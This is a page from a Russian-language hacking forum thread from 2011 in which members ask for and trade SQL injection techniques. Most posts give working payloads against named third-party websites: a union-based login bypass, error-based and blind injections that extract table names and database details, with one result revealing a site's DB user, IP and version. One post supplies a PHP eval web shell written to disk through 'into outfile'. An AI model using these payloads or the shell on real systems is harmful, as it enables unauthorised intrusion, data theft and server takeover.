Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 907 of 1207
  1. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Ну тогда примерно понятно, чо.

    Знач так. Тащемта возмем за основу:
    asd' union select 'pass', 'salt', 1, '1
    /via кто-то там


    Значит там сравнивается с пассом который ты шлешь. да.

    Отсылать на скрипт будем пароль: "1"(без кавычек естественно)

    думаю что выглядет в коде это как-то так:
    PHP:
    <?php
    [...]
    $sql mysql_query('SELECT что-то там откуда-то там WHERE user_name = ' $_POST['login']) or die(mysql_error());
    $user mysql_fetch_assoc($sql);
    // алгоритм будем рассматривать стандартный. md5(md5($pass).$salt);
    //SELECT user_pass, user_salt, user_group, user_id FROM `users` WHERE user_name = 'asd''
    if( md5md5($_POST['pass']) . $user['user_salt'] )  == $user['user_pass']) {
            //все ок авторизируемся
        
    }else{
            //не авторизировался.
    }
    [...]
    ?>
    Наш пароль: 1
    "Наша" соль: 2

    При авторизации пробуй слать:
    Code:
    Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), 2)) , 2, 1, 1 --  
Пасс: 1
    Или

    Code:
    //md5(md5(pass).md5(salt))
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(2))) , 2, 1, 1 --  
Пасс: 1
    И так далее по алгоритмам.

    Отчет ждем в тему :)
     
    #18121 Boolean, 25 Oct 2011
  2. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Boolean, при запросах такова вида, выскакивает ошибка мускуля, а форма авторизации говорит что не верный пароль. И кстати, мб, пароль не шифруется, т.к. он даже в куках передается в открытом виде :(
     
    #18122 M1lten, 25 Oct 2011
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    ты все варианты засолки то хоть перепробовал как тебе посоветовали?
    Тем не менее, дай ссыль чтоль.
     
    #18123 попугай, 25 Oct 2011
    1 person likes this.
  4. crackforme

    crackforme New Member

    Joined:
    3 Oct 2011
    Messages:
    208
    Likes Received:
    1
    Reputations:
    0
    Сорри за нубство мужики
    Такой вопрос

    1,2,..group_concat(login)...
    ...concat_ws(login)...

    не хочет выполнять как можно обойти фильтр?

    пробовал
    group_concat(CHAR(108,111,103,105,110))

    тоже не работает
     
    #18124 crackforme, 25 Oct 2011
    Last edited: 25 Oct 2011
  5. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Вот, при таком запросе нет ошибки мускуля, и скрипт говорит что неверный пароль:

    login = asd
    pass = 1

    И при таком тоже ошибка пропадает и неверный пароль
    Если не получится, скину.
     
    #18125 M1lten, 25 Oct 2011
    Last edited: 25 Oct 2011
  6. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    http://www.mysql.ru/docs/maryan/#concat_ws
    http://webi.ru/webi_articles/8_14_f.html
    + советую к прочтению http://raz0r.name/obzory/group_concat/
     
    #18126 Boolean, 25 Oct 2011
  7. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    site/news.php?id=18 and 1=1 (true)
    site/news.php?id=6+AND+ascii(lower(substring(user(),1,1)))=111 (true)
    site/news.php?id=18 and 1=3 (false)
    site/news.php?id=18 and 'a'='a'

    в чем суть ошибки? mq вроде бы off
     
    #18127 vaddd, 25 Oct 2011
    Last edited: 25 Oct 2011
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Народ, а чё я делоаю не правильно?
    http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+table_name+from+information_schema.tables%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

    чего мне не показывает таблицы?
     
    #18128 qaz, 25 Oct 2011
  9. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Code:
    http://english.in.ua/study.php?id=7/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
     
    #18129 er9j6@, 25 Oct 2011
    Last edited by a moderator: 26 Oct 2011
    1 person likes this.
  10. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    на самом то деле причина просто в
    д а какая разница то? Юзай hex формат. А вообще можешь кинуть линк в пм, если просто интересно.

    To, M1lten
    Может банально идёт сверка $_REQUSET['login'] == $sql_resp['login']
    $_REQUSET['login'] = sdf' sqlinj, а $sql_resp['login'] = выводимое тобою значение. Залогиниться возможно, когда идёт проверка на кол-во строк, которое вернулось после ввода. Может вообще два запроса на проверку логина и пароля, д дофига чего может быть и скуль не провести. Если ошибка от мускуля, то юзай error-based sqlinj
     
    #18130 Melfis, 25 Oct 2011
    Last edited: 25 Oct 2011
    1 person likes this.
  11. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    1. from mysql.user идёт до into dumpfile. Далее может идти только комментарий.

    Либо ищем раскрытие путей на сайте, либо читаем через load_file каталоги и ищем полный путь к сайту, хотя возможно прав на папки не бует.

    В этом случае Можно будет попробовать посмотреть директории, которые могут быть выведены с сервера, но находящийся в этом каталоге и доп. Файлы, которые можно прочитать или создать нужный файл
    А разве это нужные функции, при раскрутке SQL-inj? Если фильтр идёт на них можно будет обойтись и без их использования.
     
    #18131 randman, 26 Oct 2011
  12. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Есть доступ в phpmyadmin
    Версия MySQL 5.5.9 как залить шелл?
    Какие запросы?
     
    #18132 aydin-ka, 26 Oct 2011
  13. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    select '<?php eval($_GET[ololo]); ?>' into outfile 'абсолютный_путь_до_папки_с_правами_на_запись/shell.php'
     
    #18133 d1v, 26 Oct 2011
    1 person likes this.
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Подскажите почему не выводит названия таблиц
    http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,table_name,4,5+from+information_schema.tables%27
     
    #18134 qaz, 26 Oct 2011
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,unhex(hex(table_name)),4,5+from+information_schema.tables--+
     
    _________________________
    #18135 Konqi, 26 Oct 2011
  16. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    да и без hex и anhex все норм выводит...
    http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,table_name,4,5+from+information_schema.tables--+
     
    #18136 smirk, 26 Oct 2011
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Народ, а как ваше можно найти полный путь к файлу на хостинге?
     
    #18137 qaz, 26 Oct 2011
  18. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://forum.antichat.ru/showthread.php?t=30632
     
    #18138 d1v, 26 Oct 2011
    1 person likes this.
  19. root47

    root47 New Member

    Joined:
    2 Oct 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1 можно ли раскрутить sql in?Если да то как?
     
    #18139 root47, 27 Oct 2011
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Конечно, можно !!!

    Но вывода я не нашёл. Так что крутил как Blind SQL.

    Там 5 ветка, так что тебе повезло.
    Code:
    http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+substring((version()),1,1)=5
    Выдирай посимвольно через ASCII например вот так:

    Code:
    http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),[COLOR=Magenta][SIZE=3]1[/SIZE][/COLOR],1))=53

http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),[COLOR=Magenta][SIZE=3]2[/SIZE][/COLOR],1))=46
    Часть данных:
    PHP:
    Current User:     cod4@95.154.113.66
    Sql Version    :     5.1.58
    Current DB    :     cod4
     
    _________________________
    #18140 BigBear, 27 Oct 2011
(You must log in or sign up to post here.)
Page 907 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.